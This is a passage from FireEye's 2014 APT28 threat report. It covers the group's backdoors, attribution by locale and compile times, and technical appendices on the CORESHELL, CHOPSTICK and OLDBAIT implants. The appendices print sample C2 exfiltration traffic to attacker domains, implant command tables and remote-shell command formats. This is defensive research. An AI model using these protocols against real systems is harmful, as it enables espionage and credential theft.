|ead4ec18ebce6890d20757bb9f5285b1|45056|2014-07-25 15:44:04 UTC|Applicate|Same as previous.|
|48656a93f9ba39410763a2196aabc67f|112640|2014-07-30 11:13:24 UTC|Applicate|22|
|8c4fa713c5e2b009114adda758adc445|112640|2014-07-30 11:13:24 UTC|Applicate|Same as previous.|


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### In April 2013, based on compile time, the group began to make significant alterations to the SOURFACE downloader.


**Figure 8: NATO-themed decoy**
delivered with possible EVILTOSS
predecessor from 2004


Variants of the SOURFACE second stage
backdoor, EVILTOSS, share some code similarities
with SOURFACE. However, it contains more
capabilities, including the ability to provide access
to the file system and registry, enumerate network
resources, create processes, log keystrokes, access
stored credentials, and execute shellcode. The
backdoor encrypts data that it uploads with an RSA
public key. Many of its variants we have seen are
named netui.dll. EVILTOSS variants may use the
Simple Mail Transfer Protocol (SMTP) to send
stolen data in an attachment named “detaluri.
dat”. The backdoor attaches this file to a
preformatted email and sends it out through a
victim’s mail server.


Interestingly, we found an antivirus report from
2004[23] detailing what appears to be an early
variant of EVILTOSS. The backdoor was installed
alongside the NATO-themed decoy document
depicted in Figure 8. The backdoor sent data via
SMTP to nato_smtp@mail[.]ru and received its
tasking via POP from nato_pop@mail[.]ru.
Although we have not conclusively attributed
this sample to APT28, it does suggest the
possibility that APT28 has been operating since
as early as 2004.[24]


23 http://ae.norton.com/security_response/print_writeup.jsp?docid=2004-081915-1004-99

24 Although the malware family and interest in NATO make it likely that APT28 was involved, we cannot conclusively attribute this sample to APT28 based on

these factors alone. We have no evidence that they controlled the C2 for this malware or were using EVILTOSS in 2004. APT28 could have possibly obtained
this source code from another group of actors. Also, malware can be passed from group to group. The other malware that we associate with APT28 in this
paper is more strongly attributed to the group using additional factors, some of which we mention in Appendix A.


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### MODULAR IMPLANTS INDICATE A FORMAL DEVELOPMENT ENVIRONMENT

 A modular development framework suggests the group has had an organized development effort since as early as 2007.

uring our research, we discovered that
APT28 uses a backdoor developed using a
modular framework. We call this

#### D

backdoor CHOPSTICK, a somewhat ironic name
that comes from our semi-random name
generator. The modular design allows flexible
options for compiling variants with different
capabilities as needed, as well as deploying
additional capabilities at runtime. This allows the
developers to make targeted implants, including
only the capabilities and protocols necessary for a
specific environment. Such a modular framework
suggests the group has had an organized
development effort since as early as 2007. A
formal development environment, in which code is
versioned and well-organized, would almost
certainly be required to track and define the
various modules that can be included in the
backdoor at compile time.


CHOPSTICK variants may move messages and
information using at least three methods:

1. **Communications with a C2 server using**
**HTTP. These protocols are covered in more**
detail in Appendix D.
2. **Email sent through a specified mail server.**
One CHOPSTICK v1 variant contained
modules and functions for collecting
keystroke logs, Microsoft Office documents,
and PGP files. The monitoring for new files of
interest is performed by a “Directory
Observer” module. In one sample this
information was intended to be sent via
SMTP using a Georgian MIA mail server. It
used one of four embedded sender email
addresses (@mia.gov.ge) to send files via
email to another email address on the same
mail server. All information required for the
email was hardcoded in the backdoor.
3. **Local copying to defeat closed networks.**
One variant of CHOPSTICK focuses on
apparent air gap / closed network capabilities
by routing messages between local
directories, the registry and USB drives.


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### APT28 MALWARE INDICATES RUSSIAN SPEAKERS IN A RUSSIAN TIME ZONE

uring our research into APT28’s malware,
we noted two details consistent across
malware samples. The first was that

#### D

APT28 had consistently compiled Russian language
settings into their malware. The second was that
malware compile times from 2007 to 2014
corresponded to normal business hours in the UTC
+ 4 time zone, which includes major Russian cities
such as Moscow and St. Petersburg.

###### Use of Russian and English Language Settings in PE Resources
PE resources include language information that
can be helpful if a developer wants to show user

**Table 5: Locale and language identifiers associated with APT28 malware**


interface items in a specific language.[25] Non-default
language settings packaged with PE resources are
dependent on the developer’s build environment.
Each PE resource includes a “locale” identifier with
a language ID “composed of a primary language
identifier indicating the language and a sublanguage
identifier indicating the country/region.”[26 ]

At the time of the writing of this paper, we had
identified 103 malware samples that were both
attributed to APT28 and contained PE resources.
Table 5 shows the locale identifiers[27] with
associated language and country/region for
these samples.

|Locale ID|Primary language|Country/Region|Number of APT28 samples|
|---|---|---|---|
|0x0419|Russian (ru)|Russia (RU)|59|
|0x0409|English (en)|United States (US)|27|
|0x0000 or 0x0800|Neutral locale / System default locale language|Neutral|16|
|0x0809|English (en)|United Kingdom (GB)|1|


25Microsoft Developer Network – Multiple Language Resources http://msdn.microsoft.com/en-us/library/cc194810.aspx

26, 27 Microsoft Developer Network – Language Identifier Constants and Strings http://msdn.microsoft.com/en-us/library/dd318693.aspx


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

The samples with Russian language settings were
compiled between late 2007 and late 2013, as
depicted in Figure 9. This consistency over a
long timeframe suggests that the developers of
APT28 malware were using a build environment

**Figure 9: Number of APT28 samples with Russian language settings by compile month**


with Russian language settings at least some of
the time and made no effort to obscure this
detail. Overall, the locale IDs suggest that
APT28 developers can operate in both Russian
and English.

|2007 December 2008 March May August 2009 February May September 2010 February March August September October November December 2011 April June September December 2012 April May June July October December 2013 January July August October November December|Col2|Col3|Col4|Col5|Col6|Col7|Col8|Col9|Col10|Col11|
|---|---|---|---|---|---|---|---|---|---|---|


###### 0  1  2  3  4  5  6  7  8  9


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### Compile Times Align with Working Hours in Moscow and St. Petersburg
Of the 140 malware samples that we have
attributed to APT28 so far, over 89% were
compiled between 0400 and 1400 UTC time, as
depicted in Figure 10. Over 96% were compiled
between Monday and Friday. This parallels the
working hours in UTC+0400 (that is, compile
times begin about 8AM and end about 6PM in this
time zone). This time zone includes major Russian
cities such as Moscow and St. Petersburg.

13:00 14:00 15:00 16:00

**Figure 10: Compile Times of APT28 malware in UTC Time**

20

18

**Moscow business hours**

16

14

12

10

8

6

4

2

**0   1** **2    3** **4    5    6    7    8    9    10   11   12   13   14   15   16   17   18   19   20   21   22   23   24**

###### TIME OF DAY (UTC)

|Col1|Col2|Col3|Col4|
|---|---|---|---|
|13:00|14:00|15:00|16:00|

|20|Col2|Col3|Col4|
|---|---|---|---|
|18||||
|16|||Moscow business hours|
|14||||
|12||||
|10||||
|||||
|8 6||||
|||||
|4||||
|||||
|2||||
|||||
|||||


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### CONCLUSION

We started researching APT28 based on activity
we observed on our clients’ networks, similar to
other targeted threat groups we have identified
over time. We assess that APT28 is most likely
sponsored by the Russian government. We
summarize our key observations about APT28 in
Figure 11 below.

**Figure 11: Summary of key observations about APT28**


APT28’s characteristics—their targeting, malware,
language, and working hours—have led us to
conclude that we are tracking a focused, longstanding espionage effort. Given the available
data, we assess that APT28’s work is sponsored
by the Russian government.


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### APPENDIX A: DISTINGUISHING THREAT GROUPS

We use the term “threat group” to refer to actors
who work together to target and penetrate
networks of interest. These individuals may share
the same set of tasks, coordinate targets, and
share tools and methodology. They work together
to gain access to their targets and steal data.

The art of attributing disparate intrusion activities
to the same threat group is not always simple.
Different groups may use similar intrusion
methodologies and common tools, particularly
those that are widely available on the Internet,
such as pwdump, HTran, or Gh0st RAT. There may
be overlaps between groups caused by the sharing
of malware or exploits they have authored, or
even the sharing of personnel. Individual threat
actors may move between groups either
temporarily or permanently. A threat actor may
also be a private citizen who is hired by multiple
groups. Multiple groups, on occasion, compromise
the same target within the same timeframe.

Distinguishing one threat group from another is
possible with enough information, analytical
experience, and tools to piece it all together. We
can analyze multiple incidents and tell by the
evidence left behind that a given incident was the
result of one threat group and not another.


Threat actors leave behind various forensic
details. They may send spear phishing emails from
a specific IP address or email address. Their emails
may contain certain patterns; files have specific
names, MD5 hashes, timestamps, custom
functions, and encryption algorithms. Their
backdoors may have command and control IP
addresses or domain names embedded. These are
just a few examples of the myriad of forensic
details that we consider when distinguishing one
threat group from another.

At the most basic level, we say that two intrusion
events are attributed to the same group when we
have collected enough indicators to show beyond
a reasonable doubt that the same actor or group
of actors were involved. We track all of the
indicators and significant linkages associated with
identified threat groups in a proprietary database
that comprises millions of nodes and linkages
between them. In this way, we can always go back
and answer “why” we associated cyber threat
activity with a particular group.


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### APPENDIX B: TIMELINE OF APT28 LURES

|YEAR|LURE TOPIC|MALWARE|
|---|---|---|
|2010 2011 2011 2011 2012 2012 2012 2012 2012 2012 2013 2013 2013 2013 2013 2013 2013 2014 2014|Iran’s work with an international organization (internal document) File named “military cooperation.doc” Georgian language IT document for Ministry of Internal Affairs (internal document) “USB Disk Security is the best software to block threats that can damage your PC or compromise your personal information via USB storage.” Food security in Africa (“Food and nutrition crisis reaches peak but good forecast for 2013”) “IDF Soldier Killed and another injured in a Terror Attack” “Echo Crisis Report” on Portugal’s forest fires “FBI to monitor Facebook, Twitter, Myspace” Georgia (US state, not the country of Georgia) murder case uncovers terror plot Military attaches in London (internal document) South Africa MFA document John Shalikashvili (Georgian-Polish-American US General) Questionnaire Asia Pacific Economic Cooperation Summit 2013 reporters (internal document) Defense Attaches in Turkey (internal document) Turkish Cypriot news about Syria chemical weapons Georgian language document about drivers’ licenses (internal document) Apparent Reason Magazine-related lure sent to a journalist Mandarin language document, possibly related to a Chinese aviation group (non-public document) Netherlands-Malaysia cessation of hostilities; related to Ukraine airline attack|SOURFACE SOURFACE, OLDBAIT SOURFACE SOURFACE SOURFACE SOURFACE SOURFACE SOURFACE SOURFACE SOURFACE CHOPSTICK, CORESHELL CORESHELL SOURFACE CHOPSTICK, CORESHELL CHOPSTICK, CORESHELL EVILTOSS CORESHELL CORESHELL CORESHELL|


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### APPENDIX C:
 SOURFACE/CORESHELL

SOURFACE is a downloader that obtains a second
stage backdoor from a C2 server. Over time the
downloader has evolved and the newer versions,
usually compiled with the DLL name ‘coreshell.dll’,
are distinct enough from the older versions that
we refer to it as SOURFACE/CORESHELL or
simply CORESHELL. This appendix focuses on
these newer versions.

CORESHELL uses two threads to communicate
with its C2 server. The first thread sends beacons
that contain the process listing of the
compromised host. The second thread is
responsible for downloading and executing stage


two payloads. Messages are sent using HTTP
POST requests whose bodies contain encrypted
and Base64 encoded data. The encryption
algorithm is a custom stream cipher using a
six-byte key. Commands from the controller to the
CORESHELL implant are encrypted using another
stream cipher but this time using an eight-byte
key. CORESHELL has used the same user agent
string (“MSIE 8.0”) that SOURFACE previously
used, but in more recent samples CORESHELL
uses the default Internet Explorer user agent
string obtained from the system. Figure 11 shows
an example POST request.


**Figure 11: Example CORESHELL POST request**

POST /check/ HTTP/1.1

User-Agent: MSIE 8.0

Host: adawareblock.com

Content-Length: 58

Cache-Control: no-cache

zXeuYq+sq2m1a5HcqyC5Zd6yrC2WNYL989WCHse9qO6c7powrOUh5KY=


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

When Base64 decoded, the POST content looks like this:

00000000 cd 77 ae 62 af ac ab 69 b5 6b 91 dc ab 20 b9 65 .w.b...i.k... .e
00000010 de b2 ac 2d 96 35 82 fd f3 d5 82 1e c7 bd a8 ee ...-.5..........
00000020 9c ee 9a 30 ac e5 21 e4 a6 ...0..!..

The key used to encrypt the message is six bytes long and is appended to the end of the message. In this is
example the key would be: 30 ac e5 21 e4 a6. When the message is decrypted, the resulting plaintext is:

00000000 00 72 68 64 6e 7a 78 64 66 6d 46 36 66 35 61 68 .rhdnzxdfmF6f5ah
00000010 34 78 67 30 34 30 33 30 35 30 31 1a 00 00 00 23 4xg04030501....#
00000020 00 00 00 ...

The following table contains a breakdown of each of the field’s C2 message.

**Table 6: Example CORESHELL beacon structure**

|Offset|Value|Description|
|---|---|---|
|00|00|Command byte: 0 - Command request 1 - Process listing|
|01|“rhdn”|Unknown - Potentially a campaign identifier. Values seen so far: “rhze”, “rhdn” and “mtfs”.|
|05|“zxdfmF6f5ah4xg”|Hostname of compromised system|
|13|“0403”|Unknown - Potentially a version number. This number is hardcoded within the implant.|
|17|“05”|OS Major version|
|19|“01”|OS Minor version|
|1B|0x0000001a|Header length minus the command byte (LE DWORD)|
|1F|0x00000023|Length of the entire message (LE DWORD)|


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

Commands are sent from the C2 server to the CORESHELL backdoor in HTTP responses to the POST
requests. The command is identified by the NULL terminated UNICODE string “OK” (O\x00\K\x00\x00\
x00). The command is Base64 encoded and immediately follows the “OK” string. Figure 12 shows a
sample CORESHELL command:


**Figure 12: Example CORESHELL controller response**

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 58

O.K...AQAAAKqqAQEBAQEBAQEVzPMEUUIzQtND8kOSRLVEVUV0RRRGN0bX


The Base64 decoded string is:

00000000 01 00 00 00 AA AA 01 01 01 01 01 01 01 01 10 41 ........ .......A
00000010 70 41 10 42 33 42 D3 43 F2 43 92 44 B5 44 55 45 pA.B3B.C .C.D.DUE
00000020 74 45 14 46 37 46 D7 tE.F7F.

The following table contains a description of each field in the command message:

**Table 7:** CORESHELL C2 message structure

|Offset|Value|Description|
|---|---|---|
|00|0x00000001|Constant value, must be set to 1 (LE DWORD)|
|04|AA AA|Unknown - not referenced|
|06|01 01 01 01 01 01 01 01|Encryption key (8 bytes)|
|0E|10 41 70 41 10 42 33...|Encrypted command|


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

When the above command “10 41 70 41 10 42 33…” is decrypted using the key “01 01 01 01 01
01 01 01” the following command message is produced:

00000000 04 CC C2 04 00 42 42 42 42 43 43 43 43 44 44 44 .....BBBBCCCCDDD
00000010 44 45 45 45 45 46 46 46 46           DEEEEFFFF

The implant supports the following four command identifiers from the controller as seen in Table 8. The
first byte of the command message specifies the command type and is immediately followed by the PE or
shellcode to be executed. In this example the command byte is 04 indicating the following bytes are
shellcode. If the command byte was 01, 02, or 03 the following bytes would be a DLL or EXE that would
be written to disk and executed.

**Table 8:** CORESHELL commands

|Command ID|Description|
|---|---|
|01|Save command data as %LOCALAPPDATA%\svchost.exe and execute using CreateProcess.|
|02|Save command data as %LOCALAPPDATA%\conhost.dll and execute using “rundll32.exe \”%s\”,#1”.|
|03|Save command data as %LOCALAPPDATA%\conhost.dll and execute using LoadLibrary.|
|04|Command data is a shell code and is executed using CreateThread.|


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### APPENDIX D:
 CHOPSTICK

CHOPSTICK is a backdoor that uses a modularized, object-oriented framework written in C++. This
framework allows for a diverse set of capabilities across malware variants sharing a common code base.
CHOPSTICK may communicate with external servers using SMTP or HTTP. This appendix documents
variants using HTTP communications.

The first time CHOPSTICK is executed, it may encrypt and store configuration data in the Registry key

HKU\S-1-5-19_Classes\Software\Microsoft\MediaPlayer\{E6696105-E63E-4EF1-939E15DDD83B669A}\chnnl. The user HKU\S-1-5-19 corresponds to the LOCAL_SERVICE account SID.
The configuration block is encrypted using RC4 encryption. The key is a combination of a 50-byte static
key and a four-byte salt value randomly generated at runtime. The static key is derived from opcodes in
the backdoor.

CHOPSTICK collects detailed information from the host including the Windows version, CPU
architecture, Windows Firewall state, User Account Control (UAC) configuration settings on Windows
Vista and above and Internet Explorer settings. It also tests for the installation of specific security
products (Table 9) and applications (Table 10).

**Table 9:** Endpoint security products detected by CHOPSTICK

|Service Name|Security Product|
|---|---|
|Acssrv|Agnitum Client Security|
|AVP|Kaspersky|
|SepMasterService|Symantec|
|McAfeeService|McAfee|
|AntiVirService|Avira|
|Ekrn|ESET|
|DrWebAVService|Dr. Web Enterprise Security|
|MBAMService|Malwarebytes Anti-Malware|


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

**Table 10:** Applications detected by CHOPSTICK

|Process Name|Application|
|---|---|
|firefox.exe|Mozilla Firefox|
|iexplore.exe|Internet Explorer|
|outlook.exe|Microsoft Outlook|
|opera.exe|Opera Browser|
|bat.exe|Unknown|
|msimn.exe|Outlook Express|
|vpngui.exe|Cisco Anyconnect VPN client|
|ipseca.exe|IPsec VPN client|
|ipsecc.exe|IPsec VPN client|
|openvpn.exe|OpenVPN client|
|openssl.exe|OpenSSL|
|openvpn-gui-1.0.3.exe|OpenVPN client|
|msmsgs.exe|Microsoft Messenger|
|wuauclt.exe|Windows Update|
|chrome.exe|Google Chrome Browser|
|thebat.exe|The Bat Secure Email Client|
|skype.exe|Skype Messenger|


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

After collecting host information, CHOPSTICK creates a hidden file that may be named
%ALLUSERSPROFILE%\edg6EF885E2.tmp for temporary storage and creates a Windows mailslot with the
name “check_mes_v5555”.[28] Its usage of a Windows mailslot would potentially allow external binaries to
write data to the “check_mes_v5555” mailslot, possibly allowing CHOPSTICK to encrypt and store
output from other malware. It creates a thread that records user activity on the host, capturing desktop
screenshots in JPEG format, tracks current window focus, collects keystrokes, and scrapes window
contents (text, context menus, etc.). User activity is captured once every 500 milliseconds and logged in
an HTML-like format. The thread writes user activity log messages to the “check_mes_v5555” mailslot in
plain text. CHOPSTICK reads messages from the mailslot, encrypts them using RC4, and then stores the
encrypted message in an edg6EF885E2.tmp temporary file. The RC4 encryption used here also uses a 50byte static key plus four-byte random salt value.

After approximately 60 seconds of execution time, CHOPSTICK begins communicating with one of its C2
servers over HTTP. After sending an initial HTTP GET request it uploads the file contents of edg6EF885E2.
tmp to the C2 server using HTTP POST requests. It does not wait for a response from the server to begin
uploading. Once the contents of edg6EF885E2.tmp are uploaded, CHOPSTICK deletes the file. Figure 13
below contains an example of an HTTP POST request uploading a segment from edg6EF885E2.tmp.


**Figure 13: Sample CHOPSTICK v2 HTTP POST**

POST /search/?btnG=D-3U5vY&utm=79iNI&ai=NPVUnAZf8FneZ2e_qptjzwH1Q&PG3pt=nB9onK2KCi HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101
Firefox/20.0
Host: windows-updater.com
Content-Length: 77
Cache-Control: no-cache

1b2x7F4Rsi8_e4N_sYYpu1m7AJcgN6BzDpQYv1P2piFBLBqghXiHY3SIfe8cUHHYojeXfeyyOhw==


28A mailslot is a Windows inter-process communication (IPC) mechanism similar to a named pipe, but is designed for one-way communications between

processes and can also be used across the network.


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

CHOPSTICK uses a URL-safe Base64 encoding, using an alphabet that substitutes “+” and “/” for “-” and
“_”, respectively. Each HTTP request contains multiple Base64 encoded URL parameters, however only
one parameter contains information encoded by the malware (“ai=”) and the rest of the URL parameters
appear to be randomly generated per request.

CHOPSTICK encrypts an 11-byte sequence in the “ai=” parameter. The purpose of this parameter
appears to be to uniquely identify the particular instance of the backdoor to the C2 server. The Base64
encoded text of this parameter begins with a number of randomly generated alphabetical characters
presumably intended to prevent people from Base64 decoding the whole string without some knowledge
of how the malware family works. The first four bytes of the message are an XOR key for the remainder of
the data. Once decrypted using the XOR key, an 11-byte sequence is revealed. The first seven bytes are
static, and are hard-coded in CHOPSTICK, while the last four bytes appear to be unique.

The message body of the POST request is also Base64 encoded. This encoded string is also prefixed with
random characters designed to break the output of a Base64 decode operation on the entire string. The
first 15 bytes of the decoded message body comprise another 11-byte sequence similar to the sequence
stored in the “ai=” parameter as described above. Decrypting these bytes yields another static seven-byte
sequence, followed by four unique bytes. The remainder of the message body consists of the RC4
encrypted data containing the HTML-formatted user activity log, edg6EF885E2.tmp.

After uploading edg6EF885E2.tmp, CHOPSTICK continues to query its C2 servers for commands using
HTTP GET requests. The malware contains code which allows it to load or memory-map external modules
that export the following functions: SendRawPacket, GetRawPacket, InitializeExp, DestroyExp,
IsActiveChannel, GetChannelInfo, SetChannelInfo, Run, GetModuleInfo, GiveMessage,
and TakeMessage.


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### Modularity
CHOPSTICK backdoors are compiled within a modularized development framework. This means that
two separate CHOPSTICK backdoors may contain vastly different functionality, depending on which
modules were included at compile time. The modules that are included in an instance of CHOPSTICK
may be reported to the C2 server as part of POST messages. Figure 14 includes an example from a
CHOPSTICK v1 variant:


**Figure 14: Sample CHOPSTICK v1 HTTP POST including module identification**

POST /webhp?rel=psy&hl=7&ai=d2SSzFKlR4l0dRd_ZdyiwE17aTzOPeP-PVsYh1lVAXpLhIebB4=
HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101
Firefox/20.0
Host: adobeincorp.com
Content-Length: 71
Cache-Control: no-cache

d2SSzFKchH9IvjcM55eQCTbMbVAU7mR0IK6pNOrbFoF7Br0Pi__0u3Sf1Oh30_HufqHiDU=


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

To decode the POST content, the first step is to remove characters from the Base64 string (the number of
characters to remove may vary between different communication channels). In the example from Figure
14, the number of characters removed is seven. Once these characters are removed the decoded (but
still encrypted) text looks like this:

00000000 72 11 fd 22 f8 dc 33 9e 5e 40 24 db 31 b5 40 53 r..”..3.^@$.1.@S
00000010 b9 91 d0 82 ba a4 d3 ab 6c 5a 05 ec 1a f4 3e 2f ........lZ....>/
00000020 ff d2 ed d2 7f 53 a1 df 4f c7 b9 fa 87 88 35 .....S..O.....5

The first two words (“72 11” and “fd 22”) are checksums that are used to validate the message. The next 4
bytes “f8 dc 33 9e” are a salt value that is appended to the end of an RC4 key. Once decrypted, the
message looks like the following:

00000000 72 11 fd 22 f8 dc 33 9e 56 34 4d 47 4e 78 5a 57 r..”..3.V4MGNxZW
00000010 6c 76 63 6d 68 6a 4f 47 39 79 5a 51 3d 3c 3c ee lvcmhjOG9yZQ=<<.
00000020 01 00 00 01 00 23 01 10 23 01 11 23 01 13 23 .....#..#..#..#

The strings “V4MGNxZWlvcmhjOG9yZQ” and “=<<\xee” are hardcoded in the implant. The module
information starts at offset 0x20 with the string “01 00 00” and is formatted as follows:

**Table 11:** Example CHOPSTICK v1 message format

|Offset|Value|Description|
|---|---|---|
|00|0x0001|Message from the AgentKernel v1|
|02|00|Command ID|
|03|01 00 23 01 10 23 01 11 23 01 13 23|List of modules included in the implant separated by a ‘#’ character|


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

The modules included in this CHOPSTICK v1 implant are:

**Table 12:** Example CHOPSTICK v1 module list

**Module ID** **Internal Module Name** **Description**

0x0001 AgentKernel Kernel, probably version 1. Handles communication between modules and C2
tunnels.

0x1001 modKey Logs keystrokes and takes screen captures.

0x1101 modFS Facilitates file system access, such as directory browsing along with reading,
deleting and opening files.

0x1301 modProcRet Remote command shell access.

Our determination of a CHOPSTICK “v1” versus “v2” is based on the self-identification of the kernel ID
and associated modules. Compare the list of CHOPSTICK v1 modules in Table 12 with the list of modules
in an example CHOPSTICK v2 variant in Table 13:

**Table 13:** Example CHOPSTICK v2 module list

|Module ID|Internal Module Name|Description|
|---|---|---|
|0x0001|AgentKernel|Kernel, probably version 1. Handles communication between modules and C2 tunnels.|
|0x1001|modKey|Logs keystrokes and takes screen captures.|
|0x1101|modFS|Facilitates file system access, such as directory browsing along with reading, deleting and opening files.|
|0x1301|modProcRet|Remote command shell access.|

|Module ID|Internal Module Name|Description|
|---|---|---|
|0x0002|kernel|Kernel, probably version 2. Handles communication between modules and C2 tunnels.|
|0x1002||Logs keystrokes and takes screen captures.|
|0x1102||Facilitates filesystem access, such as directory browsing along with reading, deleting and opening files.|
|0x1302||Remote command shell access.|
|0x1602||Load additional DLLs.|


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

The kernel IDs 0x0001 and 0x0002 indicate different versions. The corresponding modules in each
backdoor also are consistently identified with 0x01 and 0x02, respectively, in the second byte. In both
variants the modules with keystroke log, file system access, and command shell capabilities have the
consistent identifiers 0x10, 0x11, and 0x13, respectively, in the first byte. This suggests that the first byte
in the module ID identifies the module type whereas the second byte identifies the kernel version.

The kernel sends commands to each module using its module ID. The commands that each module
understands are likely consistent from build to build. Table 14 and Table 15 show examples of commands
that each module understands.

**Table 14:** Commands understood by modFS (0x1101) module

**Command ID** **Description** **Example**

01 Find file \x01\x11\x01Directory&file&[01]

02 Read file \x01\x11\x02Directory&file&[01]

03 Write file \x01\x11\x03Directory&file&[Contents]

04 Delete file \x01\x11\x04Directory&file&[01]

05 Execute file \x01\x11\x05Directory&file&[01]

**Table 15:** Commands understood by modProcRet (0x1301) module

|Command ID|Description|Example|
|---|---|---|
|01|Find file|\x01\x11\x01Directory&file&[01]|
|02|Read file|\x01\x11\x02Directory&file&[01]|
|03|Write file|\x01\x11\x03Directory&file&[Contents]|
|04|Delete file|\x01\x11\x04Directory&file&[01]|
|05|Execute file|\x01\x11\x05Directory&file&[01]|

|Command ID|Description|Example|
|---|---|---|
|00|CMD.exe output|\x01\x13\x00[Output]|
|01|CMD.exe start|\x01\x13\x01|
|02|CMD.exe exit|\x01\x13\x02|
|11|CMD.exe input|\x01\x13\x11[Input]|


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### APPENDIX E:
 OLDBAIT

OLDBAIT is a credential harvester that installs itself in %ALLUSERPROFILE%\\Application Data\
Microsoft\MediaPlayer\updatewindws.exe. There is a missing space in the MediaPlayer directory and
the filename is missing the ‘o’ character. Both the internal strings and logic are obfuscated and are
unpacked at startup. Credentials for the following applications are collected:

               - Internet Explorer

               - Mozilla Firefox

               - Eudora

               - The Bat! (an email client made by a Moldovan company)

               - Becky! (an email client made by a Japanese company)

Both email and HTTP can be used to send out the collected credentials.  Sample HTTP traffic is
displayed in Figure 15.


**Figure 15: Example OLDBAIT HTTP traffic**

POST /index.php HTTP/1.0

Accept: text/html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Content-Length: 6482
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: windous.kz
Connection: Keep-Alive
Pragma: no-cache

prefs=C789Cu0Zacq7acr0D7LUawy6CY4REIaZBciWc6yVCN--cut-

-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

**Figure 16: Example OLDBAIT SMTP traffic**

From: lisa.cuddy@wind0ws.kz
To: dr.house@wind0ws.kz
Subject: photo(9a3d8ea4-test)
Date: Tue, 23 Sep 2014 15:42:56 -0500
MIME-Version: 1.0
Content-Type: text/plain;
charset=”us-ascii”
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2670
X-MimeOLE: Produced By Microsoft MimeOLE v6.00.2900.2670
X-Spam: Not detected

===STARTPOINT===
qVV5KyHocV3FkUeENvu9LnVIlRB0YTa7xhoTwhRlIBBI7gRzVxikQXDRkdy4vGt1WfBtg9Utzbny
Uh+usXJHZ9Esecqq0UKg5Ul1O2E2OiyBTnGDPdP00UMRx/E+2it/10wQyH/epo8zuLnCuxPe7B+K
--cut--hU+MWBLP+7h5ZojN
===ENDPOINT===

OLDBAIT handles APIs very similarly to SOURFACE and EVILTOSS. There is a setup routine that loads
the imports into a table and all API calls reference an index to this table. In SOURFACE and EVILTOSS the
table is stored in a global variable while in OLDBAIT this table is allocated at runtime and a pointer is
passed between functions.


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

FireEye, Inc. | 1440 McCarthy Blvd. Milpitas, CA 95035 | 408.321.6300 | 877.FIREEYE (347.3393) | info@fireeye.com | www.fireeye.com

© 2014 FireEye, Inc. All rights reserved. FireEye is a registered trademark of FireEye, Inc.
All other brands, products, or service names are or may be trademarks or service marks of
their respective owners. SP.APT28.EN-US.102014


-----